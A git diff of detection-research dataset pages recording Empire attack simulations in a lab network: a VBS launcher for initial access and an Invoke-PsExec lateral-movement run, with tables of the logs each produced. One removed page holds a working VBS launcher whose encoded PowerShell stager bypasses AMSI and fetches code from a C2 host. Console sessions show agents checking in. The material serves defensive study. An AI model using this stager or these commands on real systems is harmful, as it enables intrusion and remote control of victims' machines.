a/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.md b/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.md new file mode 100644 index 00000000..ebb05007 --- /dev/null +++ b/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.md 
@@ -0,0 +1,152 @@ +# Empire VBS Launcher + +An adversary can use a VBS script as a launcher for initial access techniques. + +## Technique(s) ID + +T1064 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_launcher_vbs.tar.gz](./empire_launcher_vbs.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18182022 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------------------------------|-----------------------------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 51 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 153 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 56 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 42 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 30 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 14 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 12 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 11 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 11 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 8 | +| Security | Microsoft-Windows-Security-Auditing | MPSSVC Rule-Level Policy Change | 8 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 6 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | 
Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Microsoft-Windows-Windows Firewall With Advanced Security/Firewall | Microsoft-Windows-Windows Firewall With Advanced Security | na | 8 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 1001 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 987 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 961 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 274 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 89 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 49 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 24 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File creation time changed (rule: FileCreateTime) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 54 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| 
Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Empire Activity + +``` +usestager windows/launcher_vbs +set Listener https +execute +``` + +``` +(Empire: listeners) > usestager windows/launcher_vbs +(Empire: stager/windows/launcher_vbs) > info + +Name: VBS Launcher + +Description: + Generates a .vbs launcher for Empire. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to generate stager for. + OutFile False /tmp/autoupdate.vbs File to output .vbs launcher to, + otherwise displayed on the screen. + Obfuscate False False Switch. Obfuscate the launcher + powershell code, uses the + ObfuscateCommand for obfuscation types. + For powershell only. + ObfuscateCommand False Token\All\1,Launcher\PS\12467The Invoke-Obfuscation command to use. + Only used if Obfuscate switch is True. + For powershell only. + Language True powershell Language of the stager to generate. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Proxy False default Proxy to use for request (default, none, + or other). + StagerRetries False 0 Times for the stager to retry + connecting. 
+ + +(Empire: stager/windows/launcher_vbs) > set Listener https +(Empire: stager/windows/launcher_vbs) > execute + +[*] Stager output written out to: /tmp/autoupdate.vbs + +(Empire: stager/windows/launcher_vbs) > +``` + +File is created and contains: + +``` +Dim objShell +Set objShell = WScript.CreateObject("WScript.Shell") +command = "powershell -noP -sta -w 1 -enc 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" +objShell.Run command,0 +Set objShell = Nothing +``` + +User downloads and clicks on vbs file: + +![alt text](../../../../../docs/source/_static/empire_launcher_vbs.png "vbs script") + +New agent checks in.. + +``` +(Empire) > +(Empire) > [*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent H3DKB8SA checked in +[+] Initial agent H3DKB8SA from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to H3DKB8SA at 10.0.10.103 + +(Empire) > +(Empire) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 18:21:29 https + +(Empire: agents) > +``` \ No newline at end of file diff --git a/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.tar.gz b/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.tar.gz new file mode 100644 index 00000000..acd46572 Binary files /dev/null and b/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.tar.gz differ diff --git a/small_datasets/windows/execution/scripting_T1064/vbs/README.md b/small_datasets/windows/execution/scripting_T1064/vbs/README.md deleted file mode 100644 index 55b4b61f..00000000 --- a/small_datasets/windows/execution/scripting_T1064/vbs/README.md +++ /dev/null 
@@ -1,9 +0,0 @@ -# VBS Scripts - -An adversary can use VBS scripts to execute commands on an endpoint - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_launcher_vbs](./empire_launcher_vbs.md) | 2019-03-11223154 | \ No newline at end of file diff --git a/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.md b/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.md deleted file mode 100644 index 684fbae7..00000000 --- a/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.md +++ /dev/null 
@@ -1,148 +0,0 @@ - -# Empire VBS Launcher - -An adversary can use a VBS script as a launcher for initial access techniques. - -## Technique(s) ID - -T1064 - -## Creators - -Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) - -## Dataset - -[empire_launcher_vbs.tar.gz](./empire_launcher_vbs.tar.gz) - -## Network Environment - -Shire - -## Time Taken - -2019-03-11223154 - -## About this file - -| log_name | source_name | task | record_number | -|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 39 | -| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | -| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 383 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 140 | -| Security | Microsoft-Windows-Security-Auditing | User Account Management | 127 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 33 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 19 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 11 | -| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 8 | -| Security | Microsoft-Windows-Security-Auditing | MPSSVC Rule-Level Policy Change | 8 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 4 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 4 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 2 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 2 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | 
-| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1576 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 1282 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 780 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 353 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 114 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 60 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 51 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 49 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 17 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 42 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 1130 | - -## Empire Activity - -``` -usestager windows/launcher_vbs -set Listener https -execute -``` - -``` -(Empire: listeners) > usestager windows/launcher_vbs -(Empire: stager/windows/launcher_vbs) > info - -Name: VBS 
Launcher - -Description: - Generates a .vbs launcher for Empire. - -Options: - - Name Required Value Description - ---- -------- ------- ----------- - Listener True Listener to generate stager for. - OutFile False /tmp/launcher.vbs File to output .vbs launcher to, - otherwise displayed on the screen. - Obfuscate False False Switch. Obfuscate the launcher - powershell code, uses the - ObfuscateCommand for obfuscation types. - For powershell only. - ObfuscateCommand False Token\All\1,Launcher\PS\12467The Invoke-Obfuscation command to use. - Only used if Obfuscate switch is True. - For powershell only. - Language True powershell Language of the stager to generate. - ProxyCreds False default Proxy credentials - ([domain\]username:password) to use for - request (default, none, or other). - UserAgent False default User-agent string to use for the staging - request (default, none, or other). - Proxy False default Proxy to use for request (default, none, - or other). - StagerRetries False 0 Times for the stager to retry - connecting. 
- - -(Empire: stager/windows/launcher_vbs) > set Listener https -(Empire: stager/windows/launcher_vbs) > execute - -[*] Stager output written out to: /tmp/launcher.vbs - -(Empire: stager/windows/launcher_vbs) > -``` - -File is created and contains: - -``` -Dim objShell -Set objShell = WScript.CreateObject("WScript.Shell") -command = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAcwBJAG8ATgBUAEEAQgBMAGUALgBQAFMAVgBFAFIAUwBpAE8AbgAuAE0AYQBKAE8AUgAgAC0ARwBlACAAMwApAHsAJABkADMAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAE0AYgBMAFkALgBHAGUAVABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAHQARgBpAEUAYABsAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkARgAoACQARAAzADkAOAAyACkAewAkADkAZQA1AGEAYgA9ACQAZAAzADkAOAAyAC4ARwBFAHQAVgBhAEwAVQBlACgAJABuAHUAbABsACkAOwBJAGYAKAAkADkAZQA1AEEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADkAZQA1AGEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5AEUANQBhAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJAB2AGEATAA9AFsAQwBvAEwAbABFAGMAdABJAE8AbgBTAC4ARwBFAG4ARQByAEkAYwAuAEQAaQBDAHQASQBvAE4AQQBSAFkAWwBzAHQAcgBJAG4AZwAsAFMAeQBTAHQAZQBtAC4ATwBCAGoARQBjAFQAXQBdADoAOgBOAGUAVwAoACkAOwAkAHYAYQBMAC4AQQBEAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAHYAQQBMAC4AQQBEAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOQBlADUAQQBCAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAc
gBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAYQBsAH0ARQBsAHMARQB7AFsAUwBDAFIAaQBQAFQAQgBMAE8AYwBLAF0ALgAiAEcAZQB0AEYASQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbAB1AEUAKAAkAE4AVQBMAGwALAAoAE4ARQB3AC0ATwBiAEoARQBDAHQAIABDAG8AbABsAEUAYwBUAEkAbwBuAFMALgBHAGUATgBFAFIAaQBjAC4ASABBAFMASABTAGUAdABbAHMAVAByAGkATgBHAF0AKQApAH0AJABSAGUARgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUATQBCAGwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBFAHQARgBpAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEATAB1AGUAKAAkAE4AVQBMAGwALAAkAHQAUgB1AEUAKQA7AH0AOwBbAFMAWQBzAFQARQBtAC4ATgBlAHQALgBTAEUAcgBWAEkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAEcAZQByAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQASQBOAHUAZQA9ADAAOwAkADMAOAA3AEEAMQA9AE4ARQBXAC0ATwBiAEoARQBDAHQAIABTAHkAcwB0AEUAbQAuAE4ARQBUAC4AVwBFAEIAQwBMAGkARQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQAMwA4ADcAYQAxAC4ASABFAEEAZABlAFIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAMwA4ADcAQQAxAC4ASABlAGEAZABlAHIAcwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAMwA4ADcAQQAxAC4AUABSAG8AeAB5AD0AWwBTAFkAcwB0AEUATQAuAE4ARQB0AC4AVwBFAGIAUgBlAHEAVQBlAFMAVABdADoAOgBEAEUARgBhAFUATAB0AFcARQBiAFAAUgBPAFgAeQA7ACQAMwA4ADcAQQAxAC4AUABSAE8AWABZAC4AQwBSAEUAZABlAE4AdABJAEEATABzACAAPQAgAFsAUwB5AHMAVABlAE0ALgBOAEUAdAAuAEMAUgBlAGQAZQBOAHQAaQBBAGwAQwBBAGMAaABlAF0AOgA6AEQARQBGAGEAVQBsAHQAT
gBlAHQAdwBvAHIASwBDAFIAZQBkAGUAbgB0AGkAYQBsAFMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAMwA4ADcAYQAxAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUATQAuAFQAZQBYAHQALgBFAE4AQwBvAGQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgBZAFQARQBzACgAJwBkAEoAaQBxAEEANQBvAEYAewBwAFUANwBMAG4AawA6AC4ALwBJAFEAVwBUADEAcgBEAHYAKABnAEIANABSAH0AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAFMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AE8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAG4AYwBPAEQAaQBOAGcAXQA6ADoAVQBOAEkAYwBvAGQARQAuAEcARQBUAFMAVABSAEkAbgBnACgAWwBDAE8ATgBWAEUAUgBUAF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwBUAHIAaQBuAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBAHUAQQBEAEEAQQBMAGcAQQB4AEEARABBAEEATABnAEEAeABBAEQAQQBBAE4AZwBBADYAQQBEAFEAQQBOAEEAQQB6AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAMwA4ADcAQQAxAC4ASABlAEEARABFAHIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBFAFcAcQBYAGQAcgBBAHEAbgBQAFIAawBNAEoAdQBGAD0AaAB4AGoARgBKAGoAbwBBAFAAegBiAEUASQB4ACsANABQADgAZgBCAGsAOQBHAEYASAAyAE0APQAiACkAOwAkAGQAQQBUAEEAPQAkADMAOAA3AGEAMQAuAEQAbwB3AG4AbABvAGEAZABEAEEAdABhACgAJABzAEUAUgArACQAVAApADsAJABJAFYAPQAkAGQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAQQBUAEEAWwA0AC4ALgAkAEQAQQB0AEEALgBsAGUATgBHAFQAaABdADsALQBqAG8ASQBOAFsAQwBIAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" -objShell.Run command,0 -Set objShell = Nothing -``` - -User downloads and clicks on vbs file: - -![alt text](../../../../../resources/images/empire_launcher_vbs.png "vbs script") - -New agent 
checks in.. - -``` -(Empire: stager/windows/launcher_vbs) > [*] Sending POWERSHELL stager (stage 1) to 10.0.10.104 -[*] New agent 7NTMF3VR checked in -[+] Initial agent 7NTMF3VR from 10.0.10.104 now active (Slack) -[*] Sending agent (stage 2) to 7NTMF3VR at 10.0.10.104 - -(Empire: stager/windows/launcher_vbs) > -(Empire: stager/windows/launcher_vbs) > agents - -[*] Active agents: - - Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener - ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- - 7NTMF3VR ps 172.18.39.105 IT001 SHIRE\pgustavo powershell 6536 5/0.0 2019-03-11 22:31:54 https - -(Empire: agents) > -``` \ No newline at end of file diff --git a/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.tar.gz b/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.tar.gz deleted file mode 100644 index f52063c5..00000000 Binary files a/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.tar.gz and /dev/null differ diff --git a/small_datasets/windows/execution/service_execution_T1035/README.md b/small_datasets/windows/execution/service_execution_T1035/README.md new file mode 100644 index 00000000..3fa8728a --- /dev/null +++ b/small_datasets/windows/execution/service_execution_T1035/README.md @@ -0,0 +1,9 @@ +# Service Execution + +Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_psexec](./empire_invoke_psexec.md) | 2019-05-18210652 | \ No newline at end of file 
diff --git a/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.md b/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.md new file mode 100644 index 00000000..c8f5ba63 --- /dev/null +++ b/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.md 
@@ -0,0 +1,144 @@ +# Empire Invoke Psexec + +Executes a stager on remote hosts using PsExec type functionality. + +## Technique(s) ID + +T1035 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_psexec.tar.gz](./empire_invoke_psexec.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18210652 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 574 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 14 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| System | Service Control Manager | na | 3 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 169 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 91 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 32 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 10 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 6 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 4 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 1 | +| Security | Microsoft-Windows-Security-Auditing | 
Security System Extension | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 455 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 423 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 329 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 152 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 24 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 498 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule 
lateral_movement/invoke_psexec +(Empire: powershell/lateral_movement/invoke_psexec) > +(Empire: powershell/lateral_movement/invoke_psexec) > info + + Name: Invoke-PsExec + Module: powershell/lateral_movement/invoke_psexec + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Executes a stager on remote hosts using PsExec type + functionality. + +Comments: + https://github.com/rapid7/metasploit- + framework/blob/master/tools/psexec.rb + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener False Listener to use. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + ComputerName True Host[s] to execute the stager on, comma + separated. + ServiceName True Updater The name of the service to create. + Command False Custom command to execute on remote + hosts. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Agent True V6W3TH8Y Agent to run module on. + ResultFile False Name of the file to write the results to + on agent machine. + +(Empire: powershell/lateral_movement/invoke_psexec) > set Listener https +(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_psexec) > execute +[>] Module is not opsec safe, run? 
